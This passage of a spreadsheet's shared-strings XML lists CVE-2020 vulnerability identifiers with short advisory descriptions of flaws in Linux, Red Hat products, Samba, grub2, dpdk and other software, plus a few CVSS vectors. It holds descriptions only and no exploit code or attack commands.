    <t>An elevation of privilege vulnerability exists when the Windows UPnP Device Host improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows UPnP Device Host Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1354.</t>
  </si>
  <si>
    <t>CVE-2020-14300</t>
  </si>
  <si>
    <t>The docker packages version docker-1.13.1-108.git4ef4b30.el7 as released for Red Hat Enterprise Linux 7 Extras via RHBA-2020:0053 (https://access.redhat.com/errata/RHBA-2020:0053) included an incorrect version of runc that was missing multiple bug and security fixes. One of the fixes regressed in that update was the fix for CVE-2016-9962, that was previously corrected in the docker packages in Red Hat Enterprise Linux 7 Extras via RHSA-2017:0116 (https://access.redhat.com/errata/RHSA-2017:0116). The CVE-2020-14300 was assigned to this security regression and it is specific to the docker packages produced by Red Hat. The original issue - CVE-2016-9962 - could possibly allow a process inside container to compromise a process entering container namespace and execute arbitrary code outside of the container. This could lead to compromise of the container host or other containers running on the same container host. This issue only affects a single version of Docker, 1.13.1-108.git4ef4b30, shipped in Red Hat Enterprise Linux 7. Both earlier and later versions are not affected.</t>
  </si>
  <si>
    <t>CVE-2020-14301</t>
  </si>
  <si>
    <t>An information disclosure vulnerability was found in libvirt in versions before 6.3.0. HTTP cookies used to access network-based disks were saved in the XML dump of the guest domain. This flaw allows an attacker to access potentially sensitive information in the domain configuration via the `dumpxml` command.</t>
  </si>
  <si>
    <t>CVE-2020-14302</t>
  </si>
  <si>
    <t>A flaw was found in Keycloak before 13.0.0 where an external identity provider, after successful authentication, redirects to a Keycloak endpoint that accepts multiple invocations with the use of the same "state" parameter. This flaw allows a malicious user to perform replay attacks.</t>
  </si>
  <si>
    <t>CVE-2020-14303</t>
  </si>
  <si>
    <t>A flaw was found in the AD DC NBT server in all Samba versions before 4.10.17, before 4.11.11 and before 4.12.4. A samba user could send an empty UDP packet to cause the samba server to crash.</t>
  </si>
  <si>
    <t>CVE-2020-14304</t>
  </si>
  <si>
    <t>A memory disclosure flaw was found in the Linux kernel's ethernet drivers, in the way it read data from the EEPROM of the device. This flaw allows a local user to read uninitialized values from the kernel memory. The highest threat from this vulnerability is to confidentiality.</t>
  </si>
  <si>
    <t>CVE-2020-14305</t>
  </si>
  <si>
    <t>An out-of-bounds memory write flaw was found in how the Linux kernel’s Voice Over IP H.323 connection tracking functionality handled connections on ipv6 port 1720. This flaw allows an unauthenticated remote user to crash the system, causing a denial of service. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2020-14306</t>
  </si>
  <si>
    <t>An incorrect access control flaw was found in the operator, openshift-service-mesh/istio-rhel8-operator all versions through 1.1.3. This flaw allows an attacker with a basic level of access to the cluster to deploy a custom gateway/pod to any namespace, potentially gaining access to privileged service account tokens. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2020-14307</t>
  </si>
  <si>
    <t>A vulnerability was found in Wildfly's Enterprise Java Beans (EJB) versions shipped with Red Hat JBoss EAP 7, where SessionOpenInvocations are never removed from the remote InvocationTracker after a response is received in the EJB Client, as well as the server. This flaw allows an attacker to craft a denial of service attack to make the service unavailable.</t>
  </si>
  <si>
    <t>CVE-2020-14308</t>
  </si>
  <si>
    <t>In grub2 versions before 2.06 the grub memory allocator doesn't check for possible arithmetic overflows on the requested allocation size. This leads the function to return invalid memory allocations which can be further used to cause possible integrity, confidentiality and availability impacts during the boot process.</t>
  </si>
  <si>
    <t>CVE-2020-14309</t>
  </si>
  <si>
    <t>There's an issue with grub2 in all versions before 2.06 when handling squashfs filesystems containing a symbolic link with name length of UINT32 bytes in size. The name size leads to an arithmetic overflow leading to a zero-size allocation further causing a heap-based buffer overflow with attacker controlled data.</t>
  </si>
  <si>
    <t>CVE-2020-1431</t>
  </si>
  <si>
    <t>CVE-2020-14310</t>
  </si>
  <si>
    <t>There is an issue on grub2 before version 2.06 at function read_section_as_string(). It expects a font name to be at max UINT32_MAX - 1 length in bytes but it doesn't verify it before proceed with buffer allocation to read the value from the font value. An attacker may leverage that by crafting a malicious font file which has a name with UINT32_MAX, leading to read_section_as_string() to an arithmetic overflow, zero-sized allocation and further heap-based buffer overflow.</t>
  </si>
  <si>
    <t>CVE-2020-14311</t>
  </si>
  <si>
    <t>There is an issue with grub2 before version 2.06 while handling symlink on ext filesystems. A filesystem containing a symbolic link with an inode size of UINT32_MAX causes an arithmetic overflow leading to a zero-sized memory allocation with subsequent heap-based buffer overflow.</t>
  </si>
  <si>
    <t>CVE-2020-14312</t>
  </si>
  <si>
    <t>A flaw was found in the default configuration of dnsmasq, as shipped with Fedora versions prior to 31 and in all versions Red Hat Enterprise Linux, where it listens on any interface and accepts queries from addresses outside of its local subnet. In particular, the option `local-service` is not enabled. Running dnsmasq in this manner may inadvertently make it an open resolver accessible from any address on the internet. This flaw allows an attacker to conduct a Distributed Denial of Service (DDoS) against other systems.</t>
  </si>
  <si>
    <t>CVE-2020-14313</t>
  </si>
  <si>
    <t>An information disclosure vulnerability was found in Red Hat Quay in versions before 3.3.1. This flaw allows an attacker who can create a build trigger in a repository, to disclose the names of robot accounts and the existence of private repositories within any namespace.</t>
  </si>
  <si>
    <t>CVE-2020-14314</t>
  </si>
  <si>
    <t>A memory out-of-bounds read flaw was found in the Linux kernel before 5.9-rc2 with the ext3/ext4 file system, in the way it accesses a directory with broken indexing. This flaw allows a local user to crash the system if the directory exists. The highest threat from this vulnerability is to system availability.</t>
  </si>
  <si>
    <t>CVE-2020-14315</t>
  </si>
  <si>
    <t>A memory corruption vulnerability is present in bspatch as shipped in Colin Percival’s bsdiff tools version 4.3. Insufficient checks when handling external inputs allows an attacker to bypass the sanity checks in place and write out of a dynamically allocated buffer boundaries.</t>
  </si>
  <si>
    <t>CVE-2020-14316</t>
  </si>
  <si>
    <t>A flaw was found in kubevirt 0.29 and earlier. Virtual Machine Instances (VMIs) can be used to gain access to the host's filesystem. Successful exploitation allows an attacker to assume the privileges of the VM process on the host system. In worst-case scenarios an attacker can read and modify any file on the system where the VMI is running. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2020-14317</t>
  </si>
  <si>
    <t>It was found that the issue for security flaw CVE-2019-3805 appeared again in a further version of JBoss Enterprise Application Platform - Continuous Delivery (EAP-CD) introducing regression. An attacker could exploit this by modifying the PID file in /var/run/jboss-eap/ allowing the init.d script to terminate any process as root.</t>
  </si>
  <si>
    <t>364</t>
  </si>
  <si>
    <t>CVE-2020-14318</t>
  </si>
  <si>
    <t>A flaw was found in the way samba handled file and directory permissions. An authenticated user could use this flaw to gain access to certain file and directory information which otherwise would be unavailable to the attacker.</t>
  </si>
  <si>
    <t>CVE-2020-14319</t>
  </si>
  <si>
    <t>It was found that the AMQ Online console is vulnerable to a Cross-Site Request Forgery (CSRF) which is exploitable in cases where preflight checks are not instigated or bypassed. For example authorised users using an older browser with Adobe Flash are vulnerable when targeted by an attacker. This flaw affects all versions of AMQ-Online prior to 1.5.2 and Enmasse versions 0.31.0-rc1 up until but not including 0.32.2.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:H</t>
  </si>
  <si>
    <t>CVE-2020-1432</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when Skype for Business is accessed via Internet Explorer, aka 'Skype for Business via Internet Explorer Information Disclosure Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-14320</t>
  </si>
  <si>
    <t>In Moodle before 3.9.1, 3.8.4 and 3.7.7, the filter in the admin task log required extra sanitizing to prevent a reflected XSS risk.</t>
  </si>
  <si>
    <t>CVE-2020-14321</t>
  </si>
  <si>
    <t>In Moodle before 3.9.1, 3.8.4, 3.7.7 and 3.5.13, teachers of a course were able to assign themselves the manager role within that course.</t>
  </si>
  <si>
    <t>CVE-2020-14322</t>
  </si>
  <si>
    <t>In Moodle before 3.9.1, 3.8.4, 3.7.7 and 3.5.13, yui_combo needed to limit the amount of files it can load to help mitigate the risk of denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-14323</t>
  </si>
  <si>
    <t>A null pointer dereference flaw was found in samba's Winbind service in versions before 4.11.15, before 4.12.9 and before 4.13.1. A local user could use this flaw to crash the winbind service causing denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-14324</t>
  </si>
  <si>
    <t>A high severity vulnerability was found in all active versions of Red Hat CloudForms before 5.11.7.0. The out of band OS command injection vulnerability can be exploited by authenticated attacker while setuping conversion host through Infrastructure Migration Solution. This flaw allows attacker to execute arbitrary commands on CloudForms server.</t>
  </si>
  <si>
    <t>CVE-2020-14325</t>
  </si>
  <si>
    <t>Red Hat CloudForms before 5.11.7.0 was vulnerable to the User Impersonation authorization flaw which allows malicious attacker to create existent and non-existent role-based access control user, with groups and roles. With a selected group of EvmGroup-super_administrator, an attacker can perform any API request as a super administrator.</t>
  </si>
  <si>
    <t>CVE-2020-14326</t>
  </si>
  <si>
    <t>A vulnerability was found in RESTEasy, where RootNode incorrectly caches routes. This issue results in hash flooding, leading to slower requests with higher CPU time spent searching and adding the entry. This flaw allows an attacker to cause a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-14327</t>
  </si>
  <si>
    <t>A Server-side request forgery (SSRF) flaw was found in Ansible Tower in versions before 3.6.5 and before 3.7.2. Functionality on the Tower server is abused by supplying a URL that could lead to the server processing it. This flaw leads to the connection to internal services or the exposure of additional internal services by abusing the test feature of lookup credentials to forge HTTP/HTTPS requests from the server and retrieving the results of the response.</t>
  </si>
  <si>
    <t>CVE-2020-14328</t>
  </si>
  <si>
    <t>A flaw was found in Ansible Tower in versions before 3.7.2. A Server Side Request Forgery flaw can be abused by supplying a URL which could lead to the server processing it connecting to internal services or exposing additional internal services and more particularly retrieving full details in case of error. The highest threat from this vulnerability is to data confidentiality.</t>
  </si>
  <si>
    <t>CVE-2020-14329</t>
  </si>
  <si>
    <t>A data exposure flaw was found in Ansible Tower in versions before 3.7.2, where sensitive data can be exposed from the /api/v2/labels/ endpoint. This flaw allows users from other organizations in the system to retrieve any label from the organization and also disclose organization names. The highest threat from this vulnerability is to confidentiality.</t>
  </si>
  <si>
    <t>CVE-2020-1433</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when Microsoft Edge PDF Reader improperly handles objects in memory, aka 'Microsoft Edge PDF Information Disclosure Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-14330</t>
  </si>
  <si>
    <t>An Improper Output Neutralization for Logs flaw was found in Ansible when using the uri module, where sensitive data is exposed to content and json output. This flaw allows an attacker to access the logs or outputs of performed tasks to read keys used in playbooks from other users within the uri module. The highest threat from this vulnerability is to data confidentiality.</t>
  </si>
  <si>
    <t>CVE-2020-14331</t>
  </si>
  <si>
    <t>A flaw was found in the Linux kernel’s implementation of the invert video code on VGA consoles when a local attacker attempts to resize the console, calling an ioctl VT_RESIZE, which causes an out-of-bounds write to occur. This flaw allows a local user with access to the VGA console to crash the system, potentially escalating their privileges on the system. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2020-14332</t>
  </si>
  <si>
    <t>A flaw was found in the Ansible Engine when using module_args. Tasks executed with check mode (--check-mode) do not properly neutralize sensitive data exposed in the event data. This flaw allows unauthorized users to read this data. The highest threat from this vulnerability is to confidentiality.</t>
  </si>
  <si>
    <t>CVE-2020-14333</t>
  </si>
  <si>
    <t>A flaw was found in Ovirt Engine's web interface in ovirt 4.4 and earlier, where it did not filter user-controllable parameters completely, resulting in a reflected cross-site scripting attack. This flaw allows an attacker to leverage a phishing attack, steal an unsuspecting user's cookies or other confidential information, or impersonate them within the application's context.</t>
  </si>
  <si>
    <t>CVE-2020-14334</t>
  </si>
  <si>
    <t>A flaw was found in Red Hat Satellite 6 which allows privileged attacker to read cache files. These cache credentials could help attacker to gain complete control of the Satellite instance.</t>
  </si>
  <si>
    <t>CVE-2020-14335</t>
  </si>
  <si>
    <t>A flaw was found in Red Hat Satellite, which allows a privileged attacker to read OMAPI secrets through the ISC DHCP of Smart-Proxy. This flaw allows an attacker to gain control of DHCP records from the network. The highest threat from this vulnerability is to system availability.</t>
  </si>
  <si>
    <t>CVE-2020-14336</t>
  </si>
  <si>
    <t>A flaw was found in the Restricted Security Context Constraints (SCC), where it allows pods to craft custom network packets. This flaw allows an attacker to cause a denial of service attack on an OpenShift Container Platform cluster if they can deploy pods. The highest threat from this vulnerability is to system availability.</t>
  </si>
  <si>
    <t>CVE-2020-14337</t>
  </si>
  <si>
    <t>A data exposure flaw was found in Tower, where sensitive data was revealed from the HTTP return error codes. This flaw allows an unauthenticated, remote attacker to retrieve pages from the default organization and verify existing usernames. The highest threat from this vulnerability is to data confidentiality.</t>
  </si>
  <si>
    <t>CVE-2020-14338</t>
  </si>
  <si>
    <t>A flaw was found in Wildfly's implementation of Xerces, specifically in the way the XMLSchemaValidator class in the JAXP component of Wildfly enforced the "use-grammar-pool-only" feature. This flaw allows a specially-crafted XML file to manipulate the validation process in certain cases. This issue is the same flaw as CVE-2020-14621, which affected OpenJDK, and uses a similar code. This flaw affects all Xerces JBoss versions before 2.12.0.SP3.</t>
  </si>
  <si>
    <t>CVE-2020-14339</t>
  </si>
  <si>
    <t>A flaw was found in libvirt, where it leaked a file descriptor for `/dev/mapper/control` into the QEMU process. This file descriptor allows for privileged operations to happen against the device-mapper on the host. This flaw allows a malicious guest user or process to perform operations outside of their standard permissions, potentially causing serious damage to the host operating system. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2020-1434</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that the Windows Sync Host Service handles objects in memory, aka 'Windows Sync Host Service Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-14340</t>
  </si>
  <si>
    <t>A vulnerability was discovered in XNIO where file descriptor leak caused by growing amounts of NIO Selector file handles between garbage collection cycles. It may allow the attacker to cause a denial of service. It affects XNIO versions 3.6.0.Beta1 through 3.8.1.Final.</t>
  </si>
  <si>
    <t>CVE-2020-14341</t>
  </si>
  <si>
    <t>The "Test Connection" available in v7.x of the Red Hat Single Sign On application console can permit an authorized user to cause SMTP connections to be attempted to arbitrary hosts and ports of the user's choosing, and originating from the RHSSO installation. By observing differences in the timings of these scans, an attacker may glean information about hosts and ports which they do not have access to scan directly.</t>
  </si>
  <si>
    <t>CVE-2020-14342</t>
  </si>
  <si>
    <t>It was found that cifs-utils' mount.cifs was invoking a shell when requesting the Samba password, which could be used to inject arbitrary commands. An attacker able to invoke mount.cifs with special permission, such as via sudo rules, could use this flaw to escalate their privileges.</t>
  </si>
  <si>
    <t>CVE-2020-14343</t>
  </si>
  <si>
    <t>A vulnerability was discovered in the PyYAML library in versions before 5.4, where it is susceptible to arbitrary code execution when it processes untrusted YAML files through the full_load method or with the FullLoader loader. Applications that use the library to process untrusted input may be vulnerable to this flaw. This flaw allows an attacker to execute arbitrary code on the system by abusing the python/object/new constructor. This flaw is due to an incomplete fix for CVE-2020-1747.</t>
  </si>
  <si>
    <t>CVE-2020-14344</t>
  </si>
  <si>
    <t>An integer overflow leading to a heap-buffer overflow was found in The X Input Method (XIM) client was implemented in libX11 before version 1.6.10. As per upstream this is security relevant when setuid programs call XIM client functions while running with elevated privileges. No such programs are shipped with Red Hat Enterprise Linux.</t>
  </si>
  <si>
    <t>CVE-2020-14345</t>
  </si>
  <si>
    <t>A flaw was found in X.Org Server before xorg-x11-server 1.20.9. An Out-Of-Bounds access in XkbSetNames function may lead to a privilege escalation vulnerability. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2020-14346</t>
  </si>
  <si>
    <t>A flaw was found in xorg-x11-server before 1.20.9. An integer underflow in the X input extension protocol decoding in the X server may lead to arbitrary access of memory contents. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2020-14347</t>
  </si>
  <si>
    <t>A flaw was found in the way xserver memory was not properly initialized. This could leak parts of server memory to the X client. In cases where Xorg server runs with elevated privileges, this could result in possible ASLR bypass. Xorg-server before version 1.20.9 is vulnerable.</t>
  </si>
  <si>
    <t>CVE-2020-14348</t>
  </si>
  <si>
    <t>It was found in AMQ Online before 1.5.2 that injecting an invalid field to a user's AddressSpace configuration of the user namespace puts AMQ Online in an inconsistent state, where the AMQ Online components do not operate properly, such as the failure of provisioning and the failure of creating addresses, though this does not impact upon already existing messaging clients or brokers.</t>
  </si>
  <si>
    <t>CVE-2020-14349</t>
  </si>
  <si>
    <t>It was found that PostgreSQL versions before 12.4, before 11.9 and before 10.14 did not properly sanitize the search_path during logical replication. An authenticated attacker could use this flaw in an attack similar to CVE-2018-1058, in order to execute arbitrary SQL command in the context of the user used for replication.</t>
  </si>
  <si>
    <t>CVE-2020-1435</t>
  </si>
  <si>
    <t>CVE-2020-14350</t>
  </si>
  <si>
    <t>It was found that some PostgreSQL extensions did not use search_path safely in their installation script. An attacker with sufficient privileges could use this flaw to trick an administrator into executing a specially crafted script, during the installation or update of such extension. This affects PostgreSQL versions before 12.4, before 11.9, before 10.14, before 9.6.19, and before 9.5.23.</t>
  </si>
  <si>
    <t>CVE-2020-14351</t>
  </si>
  <si>
    <t>A flaw was found in the Linux kernel. A use-after-free memory flaw was found in the perf subsystem allowing a local attacker with permission to monitor perf events to corrupt memory and possibly escalate privileges. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2020-14352</t>
  </si>
  <si>
    <t>A flaw was found in librepo in versions before 1.12.1. A directory traversal vulnerability was found where it failed to sanitize paths in remote repository metadata. An attacker controlling a remote repository may be able to copy files outside of the destination directory on the targeted system via path traversal. This flaw could potentially result in system compromise via the overwriting of critical system files. The highest threat from this flaw is to users that make use of untrusted third-party repositories.</t>
  </si>
  <si>
    <t>CVE-2020-14354</t>
  </si>
  <si>
    <t>A possible use-after-free and double-free in c-ares lib version 1.16.0 if ares_destroy() is called prior to ares_getaddrinfo() completing. This flaw possibly allows an attacker to crash the service that uses c-ares lib. The highest threat from this vulnerability is to this service availability.</t>
  </si>
  <si>
    <t>CVE-2020-14355</t>
  </si>
  <si>
    <t>Multiple buffer overflow vulnerabilities were found in the QUIC image decoding process of the SPICE remote display system, before spice-0.14.2-1. Both the SPICE client (spice-gtk) and server are affected by these flaws. These flaws allow a malicious client or server to send specially crafted messages that, when processed by the QUIC image compression algorithm, result in a process crash or potential code execution.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L</t>
  </si>
  <si>
    <t>CVE-2020-14356</t>
  </si>
  <si>
    <t>A flaw null pointer dereference in the Linux kernel cgroupv2 subsystem in versions before 5.7.10 was found in the way when reboot the system. A local user could use this flaw to crash the system or escalate their privileges on the system.</t>
  </si>
  <si>
    <t>CVE-2020-14359</t>
  </si>
  <si>
    <t>A vulnerability was found in all versions of Keycloak Gatekeeper, where on using lower case HTTP headers (via cURL) an attacker can bypass our Gatekeeper. Lower case headers are also accepted by some webservers (e.g. Jetty). This means there is no protection when we put a Gatekeeper in front of a Jetty server and use lowercase headers.</t>
  </si>
  <si>
    <t>CVE-2020-1436</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted fonts.For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely, aka 'Windows Font Library Remote Code Execution Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-14360</t>
  </si>
  <si>
    <t>A flaw was found in the X.Org Server before version 1.20.10. An out-of-bounds access in the XkbSetMap function may lead to a privilege escalation vulnerability. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2020-14361</t>
  </si>
  <si>
    <t>A flaw was found in X.Org Server before xorg-x11-server 1.20.9. An Integer underflow leading to heap-buffer overflow may lead to a privilege escalation vulnerability. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2020-14362</t>
  </si>
  <si>
    <t>CVE-2020-14363</t>
  </si>
  <si>
    <t>An integer overflow vulnerability leading to a double-free was found in libX11. This flaw allows a local privileged attacker to cause an application compiled with libX11 to crash, or in some cases, result in arbitrary code execution. The highest threat from this flaw is to confidentiality, integrity as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2020-14364</t>
  </si>
  <si>
    <t>An out-of-bounds read/write access flaw was found in the USB emulator of the QEMU in versions before 5.2.0. This issue occurs while processing USB packets from a guest when USBDevice 'setup_len' exceeds its 'data_buf[4096]' in the do_token_in, do_token_out routines. This flaw allows a guest user to crash the QEMU process, resulting in a denial of service, or the potential execution of arbitrary code with the privileges of the QEMU process on the host.</t>
  </si>
  <si>
    <t>CVE-2020-14365</t>
  </si>
  <si>
    <t>A flaw was found in the Ansible Engine, in ansible-engine 2.8.x before 2.8.15 and ansible-engine 2.9.x before 2.9.13, when installing packages using the dnf module. GPG signatures are ignored during installation even when disable_gpg_check is set to False, which is the default behavior. This flaw leads to malicious packages being installed on the system and arbitrary code executed via package installation scripts. The highest threat from this vulnerability is to integrity and system availability.</t>
  </si>
  <si>
    <t>CVE-2020-14366</t>
  </si>
  <si>
    <t>A vulnerability was found in keycloak, where path traversal using URL-encoded path segments in the request is possible because the resources endpoint applies a transformation of the url path to the file path. Only few specific folder hierarchies can be exposed by this flaw</t>
  </si>
  <si>
    <t>CVE-2020-14367</t>
  </si>
  <si>
    <t>A flaw was found in chrony versions before 3.5.1 when creating the PID file under the /var/run/chrony folder. The file is created during chronyd startup while still running as the root user, and when it's opened for writing, chronyd does not check for an existing symbolic link with the same file name. This flaw allows an attacker with privileged access to create a symlink with the default PID file name pointing to any destination file in the system, resulting in data loss and a denial of service due to the path traversal.</t>
  </si>
  <si>
    <t>CVE-2020-14368</t>
  </si>
  <si>
    <t>A flaw was found in Eclipse Che in versions prior to 7.14.0 that impacts CodeReady Workspaces. When configured with cookies authentication, Theia IDE doesn't properly set the SameSite value, allowing a Cross-Site Request Forgery (CSRF) and consequently allowing a cross-site WebSocket hijack on Theia IDE. This flaw allows an attacker to gain full access to the victim's workspace through the /services endpoint. To perform a successful attack, the attacker conducts a Man-in-the-middle attack (MITM) and tricks the victim into executing a request via an untrusted link, which performs the CSRF and the Socket hijack. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2020-14369</t>
  </si>
  <si>
    <t>This release fixes a Cross Site Request Forgery vulnerability was found in Red Hat CloudForms which forces end users to execute unwanted actions on a web application in which the user is currently authenticated. An attacker can make a forgery HTTP request to the server by crafting custom flash file which can force the user to perform state changing requests like provisioning VMs, running ansible playbooks and so forth.</t>
  </si>
  <si>
    <t>CVE-2020-1437</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that the Windows Network Location Awareness Service handles objects in memory, aka 'Windows Network Location Awareness Service Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-14370</t>
  </si>
  <si>
    <t>An information disclosure vulnerability was found in containers/podman in versions before 2.0.5. When using the deprecated Varlink API or the Docker-compatible REST API, if multiple containers are created in a short duration, the environment variables from the first container will get leaked into subsequent containers. An attacker who has control over the subsequent containers could use this flaw to gain access to sensitive information stored in such variables.</t>
  </si>
  <si>
    <t>CVE-2020-14371</t>
  </si>
  <si>
    <t>A credential leak vulnerability was found in Red Hat Satellite. This flaw exposes the compute resources credentials through VMs that are running on these resources in Satellite.</t>
  </si>
  <si>
    <t>CVE-2020-14372</t>
  </si>
  <si>
    <t>A flaw was found in grub2 in versions prior to 2.06, where it incorrectly enables the usage of the ACPI command when Secure Boot is enabled. This flaw allows an attacker with privileged access to craft a Secondary System Description Table (SSDT) containing code to overwrite the Linux kernel lockdown variable content directly into memory. The table is further loaded and executed by the kernel, defeating its Secure Boot lockdown and allowing the attacker to load unsigned code. The highest threat from this vulnerability is to data confidentiality and integrity, as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2020-14373</t>
  </si>
  <si>
    <t>A use after free was found in igc_reloc_struct_ptr() of psi/igc.c of ghostscript-9.25. A local attacker could supply a specially crafted PDF file to cause a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-14374</t>
  </si>
  <si>
    <t>A flaw was found in dpdk in versions before 18.11.10 and before 19.11.5. A flawed bounds checking in the copy_data function leads to a buffer overflow allowing an attacker in a virtual machine to write arbitrary data to any address in the vhost_crypto application. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2020-14375</t>
  </si>
  <si>
    <t>A flaw was found in dpdk in versions before 18.11.10 and before 19.11.5. Virtio ring descriptors, and the data they describe are in a region of memory accessible by from both the virtual machine and the host. An attacker in a VM can change the contents of the memory after vhost_crypto has validated it. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2020-14376</t>
  </si>
  <si>
    <t>A flaw was found in dpdk in versions before 18.11.10 and before 19.11.5. A lack of bounds checking when copying iv_data from the VM guest memory into host memory can lead to a large buffer overflow. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2020-14377</t>
  </si>
  <si>
    <t>A flaw was found in dpdk in versions before 18.11.10 and before 19.11.5. A complete lack of validation of attacker-controlled parameters can lead to a buffer over read. The results of the over read are then written back to the guest virtual machine memory. This vulnerability can be used by an attacker in a virtual machine to read significant amounts of host memory. The highest threat from this vulnerability is to data confidentiality and system availability.</t>
  </si>
  <si>
    <t>CVE-2020-14378</t>
  </si>
  <si>
    <t>An integer underflow in dpdk versions before 18.11.10 and before 19.11.5 in the `move_desc` function can lead to large amounts of CPU cycles being eaten up in a long running loop. An attacker could cause `move_desc` to get stuck in a 4,294,967,295-count iteration loop. Depending on how `vhost_crypto` is being used this could prevent other VMs or network tasks from being serviced by the busy DPDK lcore for an extended period.</t>
  </si>
  <si>
    <t>CVE-2020-14379</t>
  </si>
  <si>
    <t>A flaw was found in Red Hat AMQ Broker in a way that a XEE attack can be done via Broker's configuration files, leading to denial of service and information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-1438</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory, aka 'Windows Network Connections Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1373, CVE-2020-1390, CVE-2020-1427, CVE-2020-1428.</t>
  </si>
  <si>
    <t>CVE-2020-14380</t>
  </si>
  <si>
    <t>An account takeover flaw was found in Red Hat Satellite 6.7.2 onward. A potential attacker with proper authentication to the relevant external authentication source (SSO or Open ID) can claim the privileges of already existing local users of Satellite.</t>
  </si>
  <si>
    <t>CVE-2020-14381</t>
  </si>
  <si>
    <t>A flaw was found in the Linux kernel’s futex implementation. This flaw allows a local attacker to corrupt system memory or escalate their privileges when creating a futex on a filesystem that is about to be unmounted. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2020-14382</t>
  </si>
  <si>
    <t>A vulnerability was found in upstream release cryptsetup-2.2.0 where, there's a bug in LUKS2 format validation code, that is effectively invoked on every device/image presenting itself as LUKS2 container. The bug is in segments validation code in file 'lib/luks2/luks2_json_metadata.c' in function hdr_validate_segments(struct crypt_device *cd, json_object *hdr_jobj) where the code does not check for possible overflow on memory allocation used for intervals array (see statement "intervals = malloc(first_backup * sizeof(*intervals));"). Due to the bug, library can be *tricked* to expect such allocation was successful but for far less memory then originally expected. Later it may read data FROM image crafted by an attacker and actually write such data BEYOND allocated memory.</t>
  </si>
  <si>
    <t>CVE-2020-14383</t>
  </si>
  <si>
    <t>A flaw was found in samba's DNS server. An authenticated user could use this flaw to the RPC server to crash. This RPC server, which also serves protocols other than dnsserver, will be restarted after a short delay, but it is easy for an authenticated non administrative attacker to crash it again as soon as it returns. The Samba DNS server itself will continue to operate, but many RPC services will not.</t>
  </si>
  <si>
    <t>CVE-2020-14384</t>
  </si>
  <si>
    <t>A flaw was found in JBossWeb in versions before 7.5.31.Final-redhat-3. The fix for CVE-2020-13935 was incomplete in JBossWeb, leaving it vulnerable to a denial of service attack when sending multiple requests with invalid payload length in a WebSocket frame. The highest threat from this vulnerability is to system availability.</t>
  </si>
  <si>
    <t>CVE-2020-14385</t>
  </si>
  <si>
    <t>A flaw was found in the Linux kernel before 5.9-rc4. A failure of the file system metadata validator in XFS can cause an inode with a valid, user-creatable extended attribute to be flagged as corrupt. This can lead to the filesystem being shutdown, or otherwise rendered inaccessible until it is remounted, leading to a denial of service. The highest threat from this vulnerability is to system availability.</t>
  </si>
  <si>
    <t>CVE-2020-14386</t>
  </si>
  <si>
    <t>A flaw was found in the Linux kernel before 5.9-rc4. Memory corruption can be exploited to gain root privileges from unprivileged processes. The highest threat from this vulnerability is to data confidentiality and integrity.</t>
  </si>
  <si>
    <t>CVE-2020-14387</t>
  </si>
  <si>
    <t>A flaw was found in rsync in versions since 3.2.0pre1. Rsync improperly validates certificate with host mismatch vulnerability. A remote, unauthenticated attacker could exploit the flaw by performing a man-in-the-middle attack using a valid certificate for another hostname which could compromise confidentiality and integrity of data transmitted using rsync-ssl. The highest threat from this vulnerability is to data confidentiality and integrity. This flaw affects rsync versions before 3.2.4.</t>
  </si>
  <si>
    <t>CVE-2020-14388</t>
  </si>
  <si>
    <t>A flaw was found in the Red Hat 3scale API Management Platform, where member permissions for an API's admin portal were not properly enforced. This flaw allows an authenticated user to bypass normal account restrictions and access API services where they do not have permission.</t>
  </si>
